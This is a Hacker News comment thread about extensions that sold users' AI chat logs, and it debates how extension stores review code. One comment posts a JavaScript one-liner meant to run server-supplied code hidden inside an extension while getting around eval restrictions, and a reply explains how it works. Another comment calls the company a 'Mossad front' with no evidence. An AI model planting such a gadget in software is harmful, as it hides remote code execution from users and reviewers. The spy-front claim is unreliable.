8M users' AI conversations sold for profit by "privacy" extensions
816 points
1 day ago
| 62 comments
| koi.ai
| HN
GeekyBear
1 day ago
[-]
I stick to extensions that Mozilla has manually vetted as part of the Firefox recommended extensions program.

> Firefox is committed to helping protect you against third-party software that may inadvertently compromise your data – or worse – breach your privacy with malicious intent. Before an extension receives Recommended status, it undergoes rigorous technical review by staff security experts.

https://support.mozilla.org/en-US/kb/recommended-extensions-...

I know that Google hates to pay human beings, but this is an area that needs human eyes on code, not just automated scans.

reply
Santosh83
1 day ago
[-]
Yeah IT pros and tech aware "power" users can always take these measures but the very availability of poor or maliciously coded extensions and apps in popular app stores makes it a problem considering normies will get swayed by the swanky features the software promises and will click past all misgivings and warnings. Social engineering attacks are impossible to prevent using technical means alone. Either a critical mass of ordinary people need to become more safety/privacy conscious or general purpose computing devices will become more & more niche as the very industry which creates these problems in the first place by poor review will also sell the solution of universal thin-clients and locked down devices, of course with the very happy cooperation of govts everywhere.
reply
Terr_
1 day ago
[-]
> I stick to extensions that Mozilla has manually vetted as part of the Firefox recommended extensions program.

If you're feeling extra-paranoid, the XPI file can be unpacked (ZIP) and to check over the code for anything suspicious or unreasonably-complex, particularly if the browser-extension is supposed to be something simple like "move the up/down vote arrows further apart on HN". :P

While that doesn't solve the overall ecosystem issue, every little bit helps. You'll know it's time to run away if extensions become closed-source blobs.

reply
insin
1 day ago
[-]
You can also, more conveniently, plug an extension's URL into this viewer:

https://robwu.nl/crxviewer/

reply
Y_Y
1 day ago
[-]
Now I have to trust that viewer doesn't hide the malicious code, nor that my browser does (presumably from an existing untrustworthy extension)
reply
tetris11
13 hours ago
[-]
It'd have to be adept at spotting it in all its forms first in order to hide it, which seems expensive for a free viewer
reply
dvratil
1 day ago
[-]
The question is, does Mozilla rigorously review every single update of every featured extension? Or did they just vet it once, and a malicious developer may now introduce data collection or similar "features" though a minor update of the extension and keep enjoying the "recommended" badge by Mozilla?
reply
tuetuopay
1 day ago
[-]
This may also be the reason for the extension begin "Featured" on the Chrome Web Store: Google vetted it once, and didn't think about it for each update.
reply
GeekyBear
1 day ago
[-]
> The question is, does Mozilla rigorously review every single update of every featured extension?

Yes.

reply
pacifika
1 day ago
[-]
This is just spreading FUD where an answer could have been provided.

> Before an extension receives Recommended status, it undergoes rigorous technical review by staff security experts.

https://support.mozilla.org/en-US/kb/recommended-extensions-...

reply
nevon
1 day ago
[-]
That link doesn't answer the question though. It states that the extension is reviewed before receiving the recommended status. It does not state that updates are reviewed.
reply
insin
1 day ago
[-]
They do, and it takes longer for updates to Recommended extensions to be reviewed as a result.

This is what the Firefox add-ons team sent to me when one of my extensions was invited to the Recommended program:

> If you’re interested in Control Panel for Twitter becoming a Firefox Recommended Extension there are a couple of conditions to consider:

> 1) Mozilla staff security experts manually review every new submission of all Recommended extensions; this ensures all Recommended extensions remain compliant with AMO’s privacy and security standards. Due to this rigorous monitoring you can expect slightly longer review wait times for new version submissions (up to two weeks in some cases, though it’s usually just a few days).

> 2) Developers agree to actively maintain their Recommended extension (i.e. make timely bug fixes and/or generally tend to its ongoing maintenance). Basically we don't want to include abandoned or otherwise decaying content, so if the day arrives you intend to no longer maintain Control Panel for Twitter, we simply ask you to communicate that to us so we can plan for its removal from the program.

reply
nevon
1 day ago
[-]
That's great! They should put that on the website.
reply
londons_explore
1 day ago
[-]
The problem is most codebase are huge - millions of lines when you include all the libraries etc.

Often they're compiled with typescript etc making manual review almost impossible.

And if you demand the developer send in the raw uncompiled stuff you have the difficulty of Google/Mozilla having to figure out how to compile an arbitrary project which could use custom compilers or compilation steps.

Remember that someone malicious wont hide their malicious code in main.ts... it's gonna be deep inside a chain of libraries (which they might control too, or might have vendored).

reply
londons_explore
1 day ago
[-]
For example, the following hidden anywhere in the codebase allows arbitrary code execution even under the most stringent JavaScript security policy (no eval etc):

I=c=>c.map?c[0]?c.reduce((a,b)=>a[b=I(b)]||a(b),self):c[1]:c

(How it works is an exercise to the reader)

The actual code to run can be delivered as an innocuous looking JavaScript array from some server, and potentially only delivered to one high value target.

reply
ikekkdcjkfke
1 day ago
[-]
And the reason we can’t put execution of non-declared code behind a permission is because one anal developer at chrome thinks that we shouldn’t break existing sites even though no serious site would do this and you could just show a permission popup with triangle exclamation mark
reply
londons_explore
23 hours ago
[-]
That's what's great about this - it is an interpreter which allows the attacker to do absolutely anything, but no non-declared code is directly run.
reply
johnebgd
1 day ago
[-]
Users have largely been trained to click okay when asked to give permission without thinking.
reply
arein3
1 day ago
[-]
Let me ask gemini

Wow, it deconstructed it beautifully

A Concrete Example Imagine you pass this array to the function: ['alert', 'Hello World'] Here is the step-by-step execution:

  Initialization: The accumulator a starts as self (the window object).
  Iteration 1 (b = "alert"):
  I("alert") returns string "alert".
  It tries a["alert"] (which is window["alert"]).
  This finds the alert function.

  New Accumulator a: The alert function.
  Iteration 2 (b = "Hello World"):
  I("Hello World") returns string "Hello World".
  It tries a["Hello World"]. The alert function does not have a property named "Hello World", so this is undefined.
  The || operator moves to the right side: a(b).
  It executes alert("Hello World").
  Result: A browser popup appears.
reply
cj
1 day ago
[-]
Isn’t minified code banned from chrome extensions?
reply
electroly
1 day ago
[-]
Google allows minified extensions and doesn't require you to provide the original unminified source. I've never provided Google the real source code to my extension and they rubber-stamp every release. The Chrome Web Store is the wild west--you're on your own.

Mozilla allows minification but you're required to provide the original buildable source. Mozilla actually looks at the code and they reject updates all the time.

reply
cj
1 day ago
[-]
Obfuscation is banned. Minification is not.

https://blog.chromium.org/2018/10/trustworthy-chrome-extensi...

reply
sixtyj
1 day ago
[-]
Probably off topic: I once tried to find bad code in a WordPress theme. And it was hidden so deep and inconspicuously. The only thing that really helped was to do a diff.

In JS this can be much harder to find anything suspicious when the code can be minified.

But back to Firefox: My house, my rules. So let external developers set some more strict rules that discourage the bad actors a little.

reply
sixtyj
1 day ago
[-]
When managers take up their positions, they must sign not only their employment contracts but also various codes of ethics and other documents.

When a survey was conducted on the misuse of finances and powers, it was found that managers who did not sign the code (because they had to study it and then "forgot" to do so) were more likely to cheat than those who actually signed the documents.

reply
j-bos
1 day ago
[-]
Funny enough the article mentions this extension was manially reviewed: > A "Featured" badge from Google, meaning it had passed manual review and met what Google describes as "a high standard of user experience and design."
reply
megous
1 day ago
[-]
I at some point vetted the extensions for myself.

What I saw in Mozilla extensions store was anything from using minified code (what is this? it might have been useful in the late 90's on the web, but it surely is not necessary as part of an extension, that doesn't download its code from anywhere), to just full on data stealing code (reported, and mozilla removed it after 2 weeks or so).

I don't trust the review process one bit if they allow minified code in the store. For the same reason, "manual" review doesn't fill me with any extra warm confidence feeling. I can look at minified code manually myself, but it's just gibberish, and suspicious code is much harder to discern.

Also, I just stopped using third party extensions, except for 2 (violentmonkey, ublock), so I no longer do reviews. I had a script that would extract the XPI into a git repository before update, do a commit and show me a diff.

Friendly extension store for security conscious users would make it easy to review source code of the extension before hitting install or update. This is like the most security sensitive code that exists in the browser.

reply
Llamamoe
1 day ago
[-]
> I know that Google hates to pay human beings, but this is an area that needs human eyes on code, not automated scans.

I think we need both human review and for somebody to create an antivirus engine for code that's on par with the heuristics of good AV programs.

You could probably do even better than that since you could actually execute the code, whole or piecewise, with debugging, tracing, coverage testing, fuzzing and so on.

reply
wzdd
1 day ago
[-]
The article states that Google has done the same for this extension as part of providing its "Featured" badge.
reply
jwr
1 day ago
[-]
The article says the extension has been "manually reviewed" by Google.
reply
tremon
1 day ago
[-]
...and we all know that Google never does anything "manually", so I'd take that with the appropriate serving of salt.
reply
alfiedotwtf
1 day ago
[-]
The same applies to code editor extensions!
reply
chmod775
1 day ago
[-]
The company behind this appears to be "real" and incorporated in Delaware.

> Urban Cyber Security INC

https://opencorporates.com/companies/us_de/5136044

https://www.urbancybersec.com/about-us/

I found two addresses:

> 1007 North Orange Street 4th floor Wilmington, DE 19801 US

> 510 5th Ave 3rd floor New York, NY 10036 United States

and even a phone number: +1 917-690-8380

https://www.manhattan-nyc.com/businesses/urban-cyber-securit...

They look really legitimate on the outside, to the point that there's a fair chance they're not aware what their extension is doing. Possibly they're "victim" of this as well.

reply
swatcoder
1 day ago
[-]
> They look really legitimate on the outside

If that looks use-italics "really legitimate" to you, then you might be easily scammed. I'm not saying they're not legitimate, but nothing that you shared is a strong signal of legitimacy.

It would take a perhaps a few hundred dollars a month to maintain a business that looked exactly like this, and maybe a couple thousand to buy one that somebody else had aged ahead of time. You wouldn't have to have any actual operations. Just continuously filed corporate papers, a simple brochure website, and a couple virtual office accounts in places so dense that people don't know the virtual address sites by heart.

Old advice, but be careful believing what you encounter on the internet!

reply
ch2026
1 day ago
[-]
https://www.manhattanvirtualoffice.com/

The NY address is a virtual office.

https://themillspace.com/wilmington/

The DE address is a virtual office plus coworking facility.

reply
azinman2
1 day ago
[-]
Wow the virtual office concept is so beyond shady. I wonder if there are any legitimate uses of it?
reply
ryanjshaw
1 day ago
[-]
Many:

You run a business from home but do not want to reveal you personal address to the world.

You are from a country that Stripe doesn’t support but need to make use of their unique capabilities like Stripe Connect, then you might sign up for Stripe Atlas to incorporate in the USA so you can do business directly with Stripe. Your US business then needs a US physical address ie virtual office.

Etc

reply
nl
1 day ago
[-]
Virtual offices have been around forever and aren't really an indication of being shady necessarily.
reply
victorbjorklund
1 day ago
[-]
That you don’t need an office if your company works remotely? Kind of overkill with a whole office for a company with 3 people working at it and everyone works remotely.
reply
SoftTalker
1 day ago
[-]
Some things still require a mailing address. PO Box isn't always acceptable. Do you want it to be one of your 3 people's houses? What if one moves?
reply
fc417fc802
23 hours ago
[-]
Obvious option would be the law firm handling your business license. But can we also take a minute to appreciate the absurdity of a PO box ever being deemed unacceptable? It literally exists for this exact purpose, and there are any number of "PO box except not a PO box" schemes out there due to this issue. It ought to be illegal to treat PO boxes differently IMO.
reply
SoftTalker
21 hours ago
[-]
Mainly they want an address if they need to serve legal notice to you. You can't deliver that to a PO box, it has to be handed to someone at a physical address.
reply
Mistletoe
1 day ago
[-]
Amazing.
reply
Nevermark
1 day ago
[-]
> Urban VPN is operated by Urban Cyber Security Inc., which is affiliated with BiScience (B.I Science (2009) Ltd.), a data broker company.

> This company has been on researchers' radar before. Security researchers Wladimir Palant and John Tuckner at Secure Annex have previously documented BiScience's data collection practices. Their research established that:

> BiScience collects clickstream data (browsing history) from millions of users Data is tied to persistent device identifiers, enabling re-identification The company provides an SDK to third-party extension developers to collect and sell user data

> BiScience sells this data through products like AdClarity and Clickstream OS

> The identical AI harvesting functionality appears in seven other extensions from the same publisher, across both Chrome and Edge:

Hmm.

> They look really legitimate on the outside

Hmm, what, no.

We have a data collection company, thriving financially on lack of privacy protections, indiscriminant collection and collating of data, connected to eight data siphoning "Violate Privacy Network" apps.

And those apps are free... Which is seriously default sketchy if you can't otherwise identify some obviously noble incentives to offer free services/candy to strangers.

Once is happenstance, twice is coincidence, three (or eight) times is enemy action.

The only thing that could possibly make this look any worse is discovering a connection to Facebook.

reply
mortarion
1 day ago
[-]
Israeli company. No doubt some Mossad front.
reply
weird-eye-issue
1 day ago
[-]
You can get a mailing address and phone number for like $15/mo. You can incorporate a US business for only a couple hundred dollars.
reply
bix6
1 day ago
[-]
Is the agent address real?

1000 N. WEST ST. STE. 1501, WILMINGTON, New Castle, DE, 19801

It almost matches this law firms address but not quite.

https://www.skjlaw.com/contact-us/

Brandywine Building 1000 N. West Street, Suite 1501 Wilmington DE 19801

reply
thayne
1 day ago
[-]
Being a real business doesn't necessarily mean they can be trusted. Real companies do shady stuff all the time.
reply
consp
1 day ago
[-]
This also works in reverse: shady companies do real business. While the reason might be different the end result is the same.
reply
throw310822
1 day ago
[-]
> Urban VPN is operated by Urban Cyber Security Inc., which is affiliated with BiScience (B.I Science (2009) Ltd.), a data broker company.

BiScience is an Israeli company.

reply
hnbad
1 day ago
[-]
Israel is the new Russia, I guess.
reply
elisbce
1 day ago
[-]
Judging from their website, all links eventually point to either the VPN extension download website, or a signup link. I'm not surprised if some nation state supported APT is behind this shit.
reply
umrashrf
1 day ago
[-]
I am surprised because google review team rejects half of my extensions and apps.

Sometimes things don't make sense to me, like how "Uber Driver app access background location and there is no way to change that from settings" - https://developer.apple.com/forums/thread/783227

reply
qwertox
1 day ago
[-]
If Google would care at all for their users, they'd tell WhatsApp to not require the use of the Contacts permission only to add names to numbers when you don't share the Contacts with the App.

Or they'd tell WhatsApp to allow granting microphone permissions for one single call, instead of requesting permanent microphone permissions. All apps that I know of respect the flow of "Ask every time", all but Meta's app.

Google just doesn't care.

reply
uyzstvqs
1 day ago
[-]
That's all opinionated, and the latter is part of the OS, not WhatsApp. Not liking how an app works does not compare to an app exfiltrating data without your consent.
reply
qwertox
1 day ago
[-]
Let me explain: my WhatsApp has no privileges granted. So when a call comes in, which is a very rare thing, I get asked to grant the microphone permission. So I grant it, but only for one time, and when Android hands back focus to WhatsApp, it won't just make use of the microphone, but re-ask for microphone access, so you go into the permissions intent but there it is already set to "only this time". Only if i change it to "when I am using the app", then it works, but that is not acceptable for me, because that background use is a passive use, which can access the microphone. This means that WhatsApp can enable the mic whenever it likes, which it cannot do if "only this time" is selected. But the app is against that. I do not know how they do this, but that is what happens.
reply
donohoe
1 day ago
[-]
They are not comparing it to the data issue. The original issue was lead to further conversation. It’s a valid concern and they make a good point.
reply
josephg
1 day ago
[-]
I wish there was another button on those contact permission boxes which would tell the app you've granted permissions. But when they try to read your contacts, send them randomly generated junk. Fake phone numbers. Fake names.

Or even better, mix in some real names and phone numbers but change all the other details. I want data brokers to think I live in 8 different countries. I want my email address to show up for 50 different identities. Good luck sorting that out.

reply
marcellus23
1 day ago
[-]
I think what's going on there is that "While using" includes when a navigation app is running in the background, which is visible to the user (via e.g. a blue status bar pill). "Always" allows access even when it's not clear to the user that an app is running.

The developer documentation is actually pretty clear about this: https://developer.apple.com/documentation/bundleresources/ch...

reply
hnbad
1 day ago
[-]
This might be a case of app permissions just being poorly delineated. E.g. I've seen Android apps require "location data" access just because they want to connect over bluetooth or manage WiFi or something (not entirely sure which one it was specifically) because that is actually the same permission and the wording in the permission modal is misleading.
reply
naian
1 day ago
[-]
They are the same permission because you can guess the user’s location using Bluetooth and WiFi.
reply
jackfranklyn
1 day ago
[-]
The permissions model for browser extensions has always been backwards. You grant full access at install time, then cross your fingers that nothing changes in an update.

What we actually need is runtime permissions that fire when the extension tries to do something suspicious - like exfiltrating data to domains that aren't related to its stated function. iOS does this reasonably well for apps. Extensions should too.

The "Recommended" badge helps but it's a bandaid. If an extension needs "read and change all data on all websites" to work, maybe it shouldn't work.

reply
miguelspizza
16 hours ago
[-]
We actually have this with the permissions API. The issue is everyone just opts for longer approval times and less intrusive UX with manifest level permissions.

I agree though, runtime permissions should be the default

reply
hnbad
1 day ago
[-]
A big problem is also that you can pretty much only grant permission for one specific site or all sites and this very much depends on which of those two options the extension uses.

For example there's no need for the "inject custom JS or CSS into websites" extensions to need permission to read and write data on every single website you visit. If you only want to use them to make a few specific sites more accessible to you that doesn't mean you're okay with them touching your online banking. Especially when most of these already let you define specific URLs or patterns each rule/script should apply to.

I understand that there are still vectors for data exfiltration when the same extension has permissions on two different sites and that "code injection as a service" is inherently risky (although cross-origin policies can already lock this down somewhat) but in 2025 I'd hope we could have a more granular permission model for browser extensions that actually supports sandboxing.

reply
valicord
1 day ago
[-]
You can grant access to a few specific sites (in chrome at least), it's just hidden in settings and you need to configure it manually.
reply
murillians
1 day ago
[-]
“ A few weeks ago, I was wrestling with a major life decision. Like I've grown used to doing, I opened Claude”

Is this where we’re at with AI?

reply
nacozarina
1 day ago
[-]
People used to cast lots to make major life decisions.

Putting a token predictor in the mix — especially one incapable of any actual understanding — seems like a natural evolution.

Absolved of burden of navigating our noisy, incomplete and dissonant thoughts, we can surrender ourselves to the oracle and just obey.

reply
lionkor
1 day ago
[-]
Yes, but its incredibly dangerous when the operator of the token predictor can give you, personally, different behavior and can influence your decisions even more directly than before.
reply
nl
1 day ago
[-]
If this is surprising to you then your circle is fairly unusual.

For example HBR recently reported the number 1 use for ChatGPT is "Therapy/companionship"

https://archive.is/Y76c5

reply
meindnoch
1 day ago
[-]
Some people are incapable of internal thought. They have to verbalise/write down their thoughts, so they can hear/read it back, and that's how they make progress. In a way, these people's brain do work like LLMs.
reply
ACCount37
1 day ago
[-]
There is no evidence whatsoever that having or not having inner monologue confers any advantages or disadvantages.

For all we know, it's just two paths the brain can take to arrive at the same destination.

reply
ga_to
1 day ago
[-]
The comment (at least my reading of it) did not cast any judgement on whether this was a good or bad thing.
reply
AlecSchueler
1 day ago
[-]
The response didn't suggest that it did.
reply
hxstroy2
1 day ago
[-]
It absolutely did. Seems like you may be an example of exactly what they're discussing, and it looks disadvantageous to me.
reply
AlecSchueler
13 hours ago
[-]
Maybe you want to argue your position before going straight to the ad hominem?
reply
SoftTalker
1 day ago
[-]
It does strike me as pretty crazy, but I'm at the other end of the spectrum, I almost never think about using an AI for anything. I've tried Claude I think, twice (it wasn't very helpful). The only other AI I've ever used are the "AI summaries" that Duck Duck Go sometimes shows at the top of its search results.
reply
Miraltar
1 day ago
[-]
Delegating life decisions to AI is obviously quite stupid but it can really help lay out and question your thoughts even if it's obviously biased.
reply
senordevnyc
1 day ago
[-]
I constantly use AI like this. For life decisions, for complicated logistics situations, for technical decisions and architectures, etc. I'm not having it make any decisions for me, I'm just talking through things with another entity who has a vast breadth of knowledge, and will almost always suggest a different angle or approach that I hadn't considered.

Here's an example of the kinds of things I've talked with ChatGPT about in the last few weeks:

- I'm moving to a new area and I share custody of my daughter, so this adds a lot of complications around logistics. Talked through all that.

- Had it research niche podcasts and youtube channels for advertising / sponsorship opportunities for my SaaS

- Talked through a really complex architecture decision that's a mix of technical info and big tradeoffs for cost and customer experience.

- Did some research and talked through options for buying two new vehicles for the upcoming move, and what kinds work best for use cases (which are complex)

- Lots and lots of discussions around complex tax planning for 2026 and beyond

Again, these models have vast knowledge, as well as access to search and other tools to gather up-to-date info and sift through it far faster than I can. Why wouldn't I talk through these things with them? In my experience, with a little guardrails ("double check this" or "search and verify that X..."), I'm finding it more trustworthy than most experts in those fields. For example, I've gotten all kinds of incorrect tax advice from CPAs. Sometimes ChatGPT is out of date, but it's generally pretty accurate around taxes ime, especially if I have it search to verify things.

reply
skywhopper
1 day ago
[-]
A certain type of person loves nothing more than to spill their guts to anyone who will listen. They don’t see their conversational partners as other equally aware entities—they are just a sounding board for whatever is in this person's head. So LLMs are incredibly appealing to these folks. LLMs never get tired or zone out or make snarky responses. Add in chatbots’ obsequious enabling, and these folks are instantly hooked.
reply
haar
1 day ago
[-]
Do you just mean external vs internal processing/thinking?
reply
2bird3
1 day ago
[-]
As someone who has witnessed BiScience tracking in the past, I am not surprised to to hear that they might be involved in all this. They came up in the past when researchers investigated the cyberhaven compromise [1][2]. Though the correlation might not all be there its kind of disappointing

[1] https://secureannex.com/blog/cyberhaven-extension-compromise.... [2] https://secureannex.com/blog/sclpfybn-moneitization-scheme/ (referenced in the article)

reply
mat_b
1 day ago
[-]
I don't understand why so many people are using / trusting VPNs

"Let us handle all your internet traffic.. you can trust us.. we're free!"

No thank you.

reply
akimbostrawman
1 day ago
[-]
ISPs are so heavily regulated that the will give any federal or government agency free access to future and past internet connection information that are directly tied to your real identity.

Meanwhile reputable VPN provider like mullvad offer there service without KYC and leave feds empty handed when they knock on there doors.

https://mullvad.net/en/blog/mullvad-vpn-was-subject-to-a-sea...

reply
Joker_vD
1 day ago
[-]
For the same reason you trust your ISP? It handles all your internet traffic; and depending on where you live, probably has government-mandated back doors, or is willing to cooperate with arbitrary requests from law-enforcement agencies.

That's why TLS exists, after all. All Internet traffic is wiretapped.

reply
Dylan16807
1 day ago
[-]
I'd be significantly more suspicious by default of ISPs that charge no money.

> That's why TLS exists, after all.

That protects you if you're using standard methods to connect. Installed software gets to bypass it.

reply
psychoslave
1 day ago
[-]
Well, if someone want to cover a large set of psychological profile, they can always have a full range of virtual brands, going from freemium+ to luxurious-esthetics.

Maybe some

reply
Joker_vD
1 day ago
[-]
And that's why I, personally, rent a VPS, run "ssh -D 9010 myvps" in a background, and selectively point my browser at it via proxy.pac (other apps get socksified as needed; although some stubbornly resist it, sigh).

But it's cumbersome.

reply
silverwind
1 day ago
[-]
You should run VPN on your gateway instead.
reply
1718627440
1 day ago
[-]
Because I pay the ISP, it is heavily regulated, and they actually make a lot of money from being an ISP?
reply
bluepuma77
1 day ago
[-]
> I don't understand why so many people are using [Cloudflare].

> "Let us handle all your internet traffic.. you can trust us.. []"

TLS does not help, when most Internet traffic is passed through a single entity, which by default will use an edge TLS certificate and re-encrypt all data passing through, so will have decrypted plain text visibility to all data transmitted.

reply
gkbrk
1 day ago
[-]
I have a contract with my ISP, I can know who runs the company and I can sue the company if they violate anything they promised.
reply
Joker_vD
1 day ago
[-]
Yeah, and in your contract with ISP you explicitly agree to file any lawsuit against them in small claims court only. Although you can probably go and complain to FCC about them?
reply
nrhrjrjrjtntbt
1 day ago
[-]
TLS doesnt hide IP addresses
reply
lodovic
1 day ago
[-]
The use case is people that are urged to view something that is blocked (torrent / adult / gambling). They want it now, and they don't want to get involved with some shady company that slaps on a 2 year contract and keeps extending indefinitely. These people instead find "free vpn" in the web store and decide to give it a try.

VPNs are just one example. How many chrome extensions do you have that you don't use all the time, like adblockers, cookie consent form handlers or dark mode?

reply
mat_b
1 day ago
[-]
Me personally? I'm using Firefox with EFF privacy badger. No others.
reply
SamDc73
1 day ago
[-]
A lot of people from poor countries where they can't access a lot of websites/services and also can't pay for a VPN use these "free" VPNs

but other than that I would never trust anything other than Mullvad/IVPN/ProtonVPN

reply
fragmede
1 day ago
[-]
Yeah free VPN is totally a problem, but there's TLS so at least those users aren't getting their bank account information stolen.
reply
Egor3f
1 day ago
[-]
TLS works when app is installed somewhere else, but not in browser itself. Browser actually handles TLS termination.
reply
bsaul
1 day ago
[-]
Does tls means certificate pinning ? Can't a vpn alter dns queries to return a proxy website to your bank, using a forged certificate ?
reply
bandrami
1 day ago
[-]
Only if you've added a signing certificate the VPN controls to your CA chain. But at that point they don't have to do anything as complicated as you described.
reply
notpushkin
1 day ago
[-]
TLS means “there’s a certificate”. Yeah, if a VPN/proxy can forge a certificate that the user’s browser would trust, it’s an issue.

But considering those are browser extensions, I think they can just inspect any traffic they want on the client side (if they can get such broad permissions approved, which is probably not too hard).

reply
bennydog224
1 day ago
[-]
Google needs to act on removing these extensions/doing more thorough code reviews. Reputability is everything, and they can be actually valuable (e.g. LastPass, my own extension Ward)

There has to be a better system. Maybe a public extension safety directory?

reply
yetanotherjosh
1 day ago
[-]
I don't understand how code review would catch this. The extension advertises itself as an AI protection tool, that monitors your AI interactions. The code is basically consistent with the stated purpose. That it doesn't stop collecting data when you turn of the UI alerting is perhaps an inconsistency, but I think that's debatable (is there a rule in google's terms that says data collection is contingent on UI alerts being enabled?). I'm curious what workflow or decision tree you'd expect a code review process to follow here that results in this being rejected? The problem here doesn't seem like code related, it's policy related, as in, what are they doing with the information, not that the extension has code to collect it.
reply
johncolanduoni
1 day ago
[-]
I’m not sure there’s much more juice to squeeze here via automated or semi-automated means. They could perhaps be doing these kind of human-in-the-loop reviews themselves for all extensions that hit a certain install count, but that’s not a popular technique at Google.
reply
bennydog224
1 day ago
[-]
Chrome extension codebases are fairly basic, I think there's room to build an agentic code scanner for these, but the juice probably isn't worth the squeeze to justify for them $$$-wise. Manual reviews I agree are expensive and dicey.
reply
est
1 day ago
[-]
Google is doing code review on extensions?
reply
bennydog224
1 day ago
[-]
I’m not sure, but whenever I cut a new release I upload my extension code and it goes through a review period before they publish.
reply
H8crilA
1 day ago
[-]
Do you think Google wants to have the extensions system, given that this is how people block ads?
reply
Liquix
1 day ago
[-]
adblockers on chromium-based browsers were severely crippled by manifest V3. they're fine with extenisons (and apparently malware) as long as users can't effectively block their tracking/ads.
reply
Legend2440
1 day ago
[-]
Adblockers are still working fine though? I’m on chrome with ublock and I’m not seeing any ads.
reply
anonym29
1 day ago
[-]
you're not using ublock, you're using ublock lite. it cannot do dynamic filtering, script blocking, or url parameter removal, among other limitations.
reply
charcircuit
1 day ago
[-]
Why does that matter if he's not seeing ads. A severely crippled adblocker means that you would see ads during regular usage.

Additionally, Brave a chromium based browser has adblocking built into the browser itself meaning it is not affected by webextention changes and does not require trusting an additional 3rd party.

reply
ozgrakkurt
1 day ago
[-]
Tracking is also very important. Blocking scripts is very useful
reply
bennydog224
1 day ago
[-]
I wouldn’t be surprised if it goes away - it’s very “old Google”. We’re moving more towards walled gardens.
reply
bandrami
1 day ago
[-]
Is this even a problem that code review could find? Once they have your conversation data what happens then isn't part of the plug-in.
reply
bennydog224
1 day ago
[-]
You're not wrong, but one thing about scammy developers is they tend to be ballsy and not covert. The Koi blog covers all the egregious code specifically for exfilling LLM conversations. This stuff is a walking red flag if it was in a public commit/PR.
reply
wnevets
1 day ago
[-]
I thought manifest v3 was supposed to make chrome extensions secure?
reply
adrr
1 day ago
[-]
Its the reason why they found it because the code was in extension. Before manifest v3, extensions could just load external scripts and there's no way you could tell what they were actually doing.
reply
g947o
1 day ago
[-]
> extensions could just load external scripts and there's no way you could tell what they were actually doing.

I do think security researchers would be able to figure out what scripts are downloaded and run.

Regardless, none of this seems to matter to end users whether the script is in the extension or external.

reply
reddozen
1 day ago
[-]
nothing stopping server side logic: if request.ip != myvictim, serve no malicious payload.
reply
johncolanduoni
1 day ago
[-]
Even if the extension isn’t malicious, it creates a new attack vector that can affect users. If whatever URL the script is remotely loaded from is compromised, now all users of that extension are vulnerable.
reply
creatonez
1 day ago
[-]
Wait, does that mean Manifest v3 is so neutered that it can't load a `<script>` tag into the page if an extension needed to?

If so, I feel like something that limited is hardly even a browser extension interface in the traditional sense.

reply
johncolanduoni
1 day ago
[-]
Most browser extensions don’t need to insert script tags that point to arbitrary URLs on the internet. You can inject scripts that are bundled with the extension (you don’t even need to use an actual script tag). This is one part of manifest v3 that I think was actually a good change - ad blockers don’t do this so I don’t think Google had an ulterior motive for this particular limitation.
reply
moi2388
1 day ago
[-]
That is correct. You can not inject external scripts. You can fetch from a remote and inject through the content script though, but the content and service worker code is known at review time.

So you can still do everything you could before, but it’s not as hidden anymore

reply
tlogan
1 day ago
[-]
Let me ask you this way: How do you think they make money?
reply
PeterHolzwarth
1 day ago
[-]
I believe you may be missing the sarcasm of the post you are responding to.
reply
johncolanduoni
1 day ago
[-]
I’m here to inform you that you perhaps missed the second-order sarcasm of the post you responded to. Hopefully the chain ends here.
reply
CafeRacer
1 day ago
[-]
I am afraid you may have missed a third order of sarcasm. It sometimes called Incepticasm.
reply
droopyEyelids
1 day ago
[-]
He may have understood it, but the feelings of anger about it are so overwhelming he had to post anyway, even if it didn't perfectly flow with the conversation.
reply
QuadrupleA
1 day ago
[-]
So much of what's aimed at nontechnical consumers these days is full of dishonesty and abuse. Microsoft kinda turned Windows into something like this, you need OneDrive "for your protection", new telemetry and ads with every update, etc.

In much of the physical world thankfully there's laws and pretty-effective enforcement against people clubbing you on the head and taking your stuff, retail stores selling fake products and empty boxes, etc.

But the tech world is this ever-boiling global cauldron of intangible software processes and code - hard to get a handle on what to even regulate. Wish people would just be decent to each other, and that that would be culturally valued over materialism and moneymaking by any possible means. Perhaps it'll make a comeback.

reply
rkagerer
1 day ago
[-]
This was a nearly poetic way to put it. Thank you for ascribing words to a problem that equally frustrates me.

I spend a lot of time trying to think of concrete ways to improve the situation, and would love to hear people's ideas. Instinctively I tend to agree it largely comes down to treating your users like human beings.

reply
therobots927
1 day ago
[-]
The situation won’t be improved for as long as an incentive structure exists that drives the degradation of the user experience.

Get as off-grid as you possibly can. Try to make your everyday use of technology as deterministic as possible. The free market punishes anyone who “respects their users”. Your best bet is some type of tech co-op funded partially by a billionaire who decided to be nice one day.

reply
pksebben
1 day ago
[-]
We're not totally unempowered here, as folks who know how to tech. We can build open source alternatives that are as easy to use and install as the <epithet>-ware we are trying to combat.

Part of the problem has been that there's a mountain to climb vis a vis that extra ten miles to take something that 'works for me' and turn it into 'gramps can install this and it doesn't trigger his alopecia'.

Rather, that was the problem. If you're looking for a use case for LLMs, look no further. We do actually have the capacity to build user-friendly stuff at a fraction of the time cost that we used to.

We can make the world a better place if we actually give a shit. Make things out in the open, for free, that benefit people who aren't in tech. Chip away at the monopolies by offering a competitive service because it's the right thing to do and history will vindicate you instead of trying to squeeze a buck out of each and every thing.

I'm not saying "don't do a thing for money". You need to do that. We all need to do that. But instead of your next binge watch or fiftieth foray into Zandronum on brutal difficulty, maybe badger your llm to do all the UX/UI tweaks you could never be assed to do for that app you made that one time, so real people can use it. I'm dead certain that there are folks reading this now who have VPN or privacy solutions they've cooked up that don't steal all your data and aren't going to cost you an arm and a leg. At the very least, someone reading this has a network plugin that can sniff for exfiltrated data to known compromised networks (including data brokers) - it's probably just finicky to install, highly technical, and delicate outside of your machine. Tell claude to package that shit so larry luddite can install it and reap the benefits without learning what a bash is or how to emacs.

reply
therobots927
1 day ago
[-]
I agree and with how much money people in this field can make I’m surprised their aren’t more retired hackers banding together to build something like this. Personally I still have a mortgage to pay off but eventually I would like to be involved in something like this.
reply
rkagerer
1 day ago
[-]
What product(s) do you think present the best opportunity for reinventing today with a genuine, user-centric approach?

Personally I feel it's everything from the ground up - silicon IC's through to device platforms and cloud services. But we need a plan to chip away at the problem one bite at a time.

reply
therobots927
1 day ago
[-]
Probably a phone OS would be the most impactful. If it had the ability to really cut back on tracking and data sharing by default.

But if you’re talking about building hardware… that feels like something the NSA would be happy to be involved with whether you want them to be or not. I’d vote for an 80/20 solution that gets people protected from some of the most rampant data mining going on by corporations vs. state actors.

The other issue to keep in mind is that the tech ecosystem absolutely will suffocate anything like this by disabling access to their apps / website with this OS. So at the end of the day I really don’t know if there’s a solution to any of this.

reply
